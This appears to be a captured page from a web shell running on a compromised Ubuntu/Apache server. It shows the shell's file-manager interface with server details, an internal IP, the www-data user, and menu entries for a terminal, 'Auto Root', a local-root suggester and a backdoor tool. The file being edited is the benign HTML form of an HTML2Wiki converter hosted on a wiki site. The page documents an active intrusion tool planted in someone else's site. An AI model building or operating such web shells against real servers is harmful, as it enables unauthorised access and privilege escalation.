Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
public /
tools /
Delete
Unzip
Name
Size
Permission
Date
Action
css
[ DIR ]
drwxr-xr-x
2015-02-20 19:19
js
[ DIR ]
drwxr-xr-x
2015-02-20 19:21
html2wiki.html
3.85
KB
-rw-r--r--
2015-02-20 19:21
html2wiki.php
4.29
KB
-rw-r--r--
2015-02-20 19:06
Save
Rename
<!DOCTYPE HTML> <html><head> <meta name="robots" content="nofollow" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link href="css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" type="text/css" href="css/common.css"> <script type="text/javascript" src="js/jquery/jquery-1.10.1.min.js"></script> <script src="js/bootstrap.min.js"></script> <style type="text/css"></style> <script type='text/javascript'></script> </head> <body> <div id="menubar" class="navbar navbar-static-top"><div class="navbar-inner"> <div class="container"> <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </a> <a id="toolname" class="brand" href="?">HTML2wiki</a> <ul id="toolbar-right" class="nav pull-right"> <li><a href="/magnustools">Tools</a></li> <!-- <li><a href="//toolserver.org/~magnus">Olde tools</a></li>--> <li><a href="//bitbucket.org/magnusmanske">Git</a></li> <li><a id="discuss_link" href="//en.wikipedia.org/wiki/User_talk:Magnus_Manske">Talk</a></li> <li><a style="margin:0px;padding:0px;margin-top:4px" href="/"><img src="//wikitech.wikimedia.org/w/images/c/cf/Labslogo_thumb.png" title="Powered by Wikimedia Labs" border="0" width="32px"></a></li> </ul> </div> </div> </div> <div id="main_content" class="container"><div class="row"> <div class="span12" style="margin-bottom:20px;margin-top:10px;"> This is a slightly altered mirror of a script by Borislav Manolov, released under the <a href="http://www.gnu.org/licenses/gpl-3.0.html">GPL</a>. The original script is <a href="http://www.uni-bonn.de/~manfear/html2wiki-tables.php">here</a>.<br/><form action="./html2wiki.php" method="post" class='form-inline'> <fieldset> <legend>HTML2Wiki Converter<br /></legend> <input type="hidden" name="post" value="1" /> <label for="dashes" accesskey="d" title="accesskey 'D'"> Number of <span class="accesskey">d</span>ashes used for a row:</label> <input type="text" id="dashes" name="dashes" value="1" size="3" maxlength="2" class='span1' title="Enter here the number of dashes used for a row generation, accesskey 'D'" /> <label for="oneline" accesskey="o" title="accesskey 'O'"> Use <span class="accesskey">o</span>ne-line position of cells in a row:</label> <select id="oneline" name="oneline" class='span1' title="Use one-line position of cells in a row, accesskey 'O'"> <option value="1" >yes</option> <option value="0" selected="selected">no</option> </select> <br /> <input type="checkbox" name="escape" id="escape" checked="checked" /> <label for="escape">Replace the existing signs “!|” with their HTML entities</label> <input type="checkbox" name="otherhtml" id="otherhtml" checked="checked" /> <label for="otherhtml">Replace other HTML tags if possible</label> <br /> <label for="html" accesskey="h" title="accesskey 'H'"> <span class="accesskey">H</span>TML markup:</label> <br /> <textarea id="html" name="html" class="input" title="Enter the HTML markup here, accesskey 'H'" rows="15" cols="80" style="width:100%" onfocus="if (this.value=='Enter the HTML markup here') this.value=''" >Enter the HTML markup here</textarea><br /> <label for="wiki" accesskey="w" title="accesskey 'W'"> <span class="accesskey">W</span>iki markup:</label> <br /> <textarea id="wiki" name="wiki" class="output" title="Here will be placed the wiki markup, accesskey 'W'" rows="15" cols="80" style="width:100%" >Here will be placed the wiki markup</textarea><br /> <input type="submit" value="Convert" accesskey="x" title="Convert the HTML markup, accesskey 'X'" /> <input type="reset" value="Clear" accesskey="r" title="Clear the form, accesskey 'R'" /> </fieldset> </form></div></div></body></html>